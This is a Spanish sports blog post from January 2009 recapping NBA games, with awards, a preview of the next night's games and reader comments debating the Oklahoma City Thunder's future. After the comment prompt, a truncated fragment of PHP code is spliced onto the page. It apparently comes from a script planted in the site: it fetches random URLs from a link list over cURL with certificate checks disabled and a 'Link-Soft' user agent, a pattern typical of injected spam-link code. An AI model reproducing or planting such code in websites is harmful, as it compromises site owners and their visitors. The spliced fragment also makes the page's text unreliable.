La Crónica (21/01/2009)

22 de January de 2009 por txusma

En la carrera por ser el mejor equipo de la NBA ganaron todos los contendientes. Boston parece que por fin ha encontrado su velocidad de crucero adecuada para, sin forzarse en demasía, no perder las buenas sensaciones que te dejan las victorias. Con un primer cuarto en el que dejaron a los Heat en 10 míseros puntos, un gran acierto desde la línea de tres y un Eddie House que anotó 20 puntos en el segundo cuarto solventaron el partido con relativa facilidad. Por su parte, Andrew Bynum se convirtió en el protagonista absoluto del derbi angelino anotando 42 puntos y recogiendo 15 rebotes y eso que Kobe Bryant, con un triple doble, también exigió su parte de protagonismo. Enfrente, unos Clippers que, asoladísimos por las lesiones, sólo pudieron plantar cara hasta el tercer cuarto, en el que los Lakers apretaron el acelerador y se fueron con facilidad en el marcador.

A priori el partido más complicado de los 3 candidatos que jugaban ayer era el que enfrentaba a los Cavs y a los Blazers, pero LeBron James volvió a demostrar, una vez más, que es un jugador superior. La defensa de los Blazers sobre él fue tan perfecta que evitaron que machacara el aro ni una sola vez y tan solo pudo ir 4 veces a la línea de personal. La respuesta de King James fue excepcional, recurriendo a otras de sus innumerables armas y acabando el partido con 14 asistencias y un buen acierto en tiro de media-larga distancia. En los Blazers, titularidad para Sergio Rodríguez y 9 puntitos para Rudy, que desgraciadamente cada vez parece más encasillado en su rol de tirador.

Pistons y Hornets no juegan en la misma división que los 3 anteriores pero también saldaron sus partidos con victorias. Los primeros frente a unos patéticos Raptors que van de mal en peor y en los que Calderón no acaba de volver. Los rumores se suceden y aunque el traspaso que parece más cercano es el de Jermaine O’Neal por Shawn Marion y Marcus Banks, ahora empiezan a aparecer rumores que involucrar al jugador franquicia, Chris Bosh. Por su parte, los de New Orleans se deshicieron sin mucho problemas de los Nets a pesar de las bajas de David West y Tyson Chandler. Devin Harris está dilapidando parte del crédito conseguido en el inicio de la temporada y su nivel ha bajado considerablemente en este mes de enero. Ayer, 1 de 11 en tiros de campo.

En un partido marcado por las ausencias, los Rockets vencieron a unos Jazz que no pudieron culminar una remontada de 16 puntos. McGrady & Artest y Kirilenko & Boozer bien podrían ser parejas del famoso NBA Jam (¿alguien se acuerda?).

Las sorpresas de la jornada las dieron Bucks y Knicks. Los primeros, con una auténtico recital ofensivo ante la débil defensa de los Mavs; y los segundos, con el estilo de juego que caracterizaba a los mismo Suns hasta el año pasado. Nash y Amare seguro que echan de menos a D’Antoni.

Del resto de partidos, victoria de los Bobcats frente a los Grizzlies, de los Wizards frente a los Kings y de los Thunder frente a los Warriors.

PREMIOS

MVP: Ni los 34 puntos, 14 rebotes y 7 asistencias, ni el triple doble de Kobe Bryant alcanzan a arrebatar el premio a Andrew Bynum, quien, tras unas semanas de juego gris, explotó anoche con 42 puntos, 17 de 24 en tiros de campo, 15 rebotes y 3 tapones en 36 minutos de juego. Le faltó defender un poco, pero los 14 millones anuales que ganará a partir de este verano ya no parecen tantos.

El rookie: La canasta ganadora la anotó Jeff Green, pero no menos importante para los Thunder fue la actuación de Russell Westbrook, autor de 30 puntos con 11 de 19 en tiros, además de 7 asistencias y 4 rebotes. Tremendo el partido también de DeAndre Jordan: 11 de 12 en tiros, 23 puntos, 12 rebotes y 4 tapones.

La sorpresa: Sin McGrady & Artest ¿qué tal Alston & Wafer? Los Rockets lograron un nuevo triunfo, esta vez ante los Jazz, con magníficas actuaciones de ambos jugadores. Si Wafer logró 21 puntos con 8 de 15, Alston se fue a los 23 con 7 de 13 en tiros, además de dar 8 asistencias y coger 4 rebotes. También nos sorprendió Eddie House, con 7 triples y 25 puntos ante los Heat.

La decepción: Nos llevamos unas cuantas. El 2 de 13 de Okur tendría muchas papeletas para llevarse el premio si no fuese porque Brad Miller nos deleitó con otra lamentable actuación (4 puntos, 4 rebotes). Otra de las grandes decepciones de la noche fue Devin Harris, desastroso (1 de 11 en tiros) en la derrota de los Nets ante los Hornets y que, además, acabó lesionado.

El mayor esfuerzo en vano: Sin Boozer ni Kirilenko, Deron Williams ha de multiplicar esfuerzos. A veces, como anoche, ni así es suficiente: 32 puntos, 10 de 17 en tiros de campo, 11 asistencias con 1 sola pérdida y 5 rebotes aportó el base All-Star.

RAZONES PARA TRASNOCHAR

Hoy lo tenemos muy fácil para explicar qué razones existen para pasar sueño. Es jueves y hay únicamente dos partidos:

Celtics @ Magic. La batalla por el Este libra hoy, a las 2 de la madrugada y televisado por D+, un nuevo asalto. Una victoria de los Celtics igualaría el casillero de partidos perdidos de ambos equipos, mientras que un triunfo local dejaría a Cavs y Magic con dos derrotas menos que Boston. Especialmente interesante resultará el cara a cara entre Nelson y Rondo, ya que ambos vienen de realizar grandes actuaciones.

Wizards @ Lakers. Éstos no son los Wizards que ganaron en el Staples hace un par de temporadas, básicamente porque aquel día un señor llamado Gilbert Arenas anotó 62 puntos. Pero los capitalinos vienen de ganar en Sacramento con la mejor actuación conjunta de Caron Butler y Antawn Jamison, quienes por primera vez lograron más de 30 puntos en el mismo partido. Por el lado local, todas las miradas estarán puestas en Andrew Bynum tras su inconmensurable partido de anoche. El partido se inicia pasadas las 4:30, a continuación del Celtics-Magic.

La pregunta del día: ¿Les dais crédito a los Thunder de cara a la temporada que viene?

Comenta

10 comentarios a esta entrada

  1. Txusma dice:
    #1

    Lo digo porque esta base que han formado con Westbrook, Durant y Green tiene muy buena pinta, además de Watson, Collison y Krstic, todos jugadores muy aprovechables. Si a esto le sumamos que el año que viene tienen dinerito para gastar (pq no Boozer?) les puede quedar un equipo bien majo no?

      Citar

  2. portu dice:
    #2

    Sin un juego interior mínimamente decente no me viene a la mente ningún equipo q haya mejorado radicalmente y el de los Thunder es muy flojo.

      Citar

  3. Txusma dice:
    #3

    Ahi es donde entraría Boozer o algún otro agente libre…

      Citar

  4. dsromero dice:
    #4

    Yo creo que tienen una gran tripleta de jovenes que pueden evolucionar de manera increible pero si no consiguen fichar a algun interior agente libre de nivel no podrán hacer mucho más que este año

      Citar

  5. Viva_Dirk dice:
    #5

    A parte de Boozer o algun otro, tienen una elección del draft que será top-5 salvo catastrofe y es un año de gente interior, Griffin, Thabeet, Mullens o Hill son tios muy interiores.

    Lo que no quita que lo tengan dificil porque los de fuera no juegan en su sitio, Westbrook no es base y Durant no es escolta, en cuanto a Green, se le ve mucho mas cómodo cerca del aro, lo que les deja con un juego exterior descompensado y sin amenaza de 3 salvo Durant.

    En definitiva, mejorarán seguro, pero hacerlo mucho seguramente dependerá de que hagan con Green, si mejora su tiro exterior y se asienta como alero o si lo traspasan que sería otra opción.

      Citar

  6. Jabho dice:
    #6

    Yo si doy crédito a los Thunder, pero depende de lo que consideres dar credito. Este año están consiguiendo su objetivo que es ver crecer a la gente joven. El nivel de Westbrook ahora mismo no está lejos del de Rose o Mayo, Durant está en plan All Star y Green es un buen jugador.

    El futuro se verá en el según el pick que pillen y luego como se muevan en el mercado de agentes libres. Pero base tienen y si no se vuelven locos y van poco a poco en 2-3 años serán un equipazo, pero para el año que viene lo que hay que esperar de ellos es que se conviertan en equipo de no-loteria. Eso creo que lo conseguiran sin llegar un Boozer.

      Citar

  7. Viva_Dirk dice:
    #7

    Decir que el nivel de Westbrook no está lejos del de Rose o Mayo me parece bastante atrevido, con Rose que deberia ser la comparación al estar jugando de base, anota menos, asiste menos, pierde mas balones y tira peor, además Westbrook es un jugador puro de acompañamiento, lo era en la universidad y lo es en la NBA. Y si lo queremos comparar como escolta con Mayo, anota menos, tira peor, pierde mas balones y desde luego le falta ‘flow’.

    No digo que Westbrook no pueda hacer un papelón jugando al lado de Durant y un interior de categoría, pero ponerlo a la altura de esos 2 es equivocado.

      Citar

  8. MagicJohnson32 dice:
    #8

    Sea como sea, la impresión es que los Thunder están dando los pasos correctos. Todavía falta el paso más importante, que será cuando tengan que decidir en qué agente libres se gastan el dinero y por cuánto les saldrá. Entonces, pueden dar un paso a lo Atlanta con Joe Johnson o a lo Lakers con Shaq, quién sabe.

      Citar

  9. Dantleyolvidólacontraseña dice:
    #9

    Al rico melón. Como le he preguntado a Magic, parecía que Bynum y Jordan se habían puesto de acuerdo. Cuántos mates ha metido Bynum?? Porque lo de Jordan ha sido fácil 11 de 12 en tiros de 2, las 11 han sido mates, sólo ha metido la que estaba a más de 0.1 centimetros de la canasta.

    Westbrook no me acaba de convencer, pero mira, de esos ha habido cientos y algunos han ayudado a ganar muchísimos partidos sin ser estilistas. Creo que Oklahoma tiene muy buen futuro. No llega a la gestión de Portland pero ese es el camino

      Citar

  10. Kantonyo dice:
    #10

    A mi me cuesta creer que en un corto plazo los Thunder puedan llegar a rozar las 40 victorias. Kevin Durant es un gran jugador, pero no creo que supere a otros jugadores franquicias del oeste. Y luego tienen a jugadores muy jovenes que solo aumentan sus numeros en minutos de la basura, tanto Green como Westbrook estan bastante lejos de ser decisivos hoy en dia. Despues el banquillo es bastante flojo.

    Tambien me cuesta creer que un tio como Carlos Boozer o del mismo nivel se deje caer en esta franquicia.

    Y en el draft aunque se hiciera con Griffin, Thabet o con Blair, no veo demasiado crecimiento a corto plazo.

    Por ahora BJ Mullens ni siquiera ha demostrado personalidad en la NCAA, y sus actuaciones tanto personales como colectivas son bastante flojas. Aunque ha estado incluso en el pick 2 de todos los mockdrafts, a este ritmo no será ni top 20, asi que posiblemente no se presente este año y lo deje para 2010 como ricky rubio.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>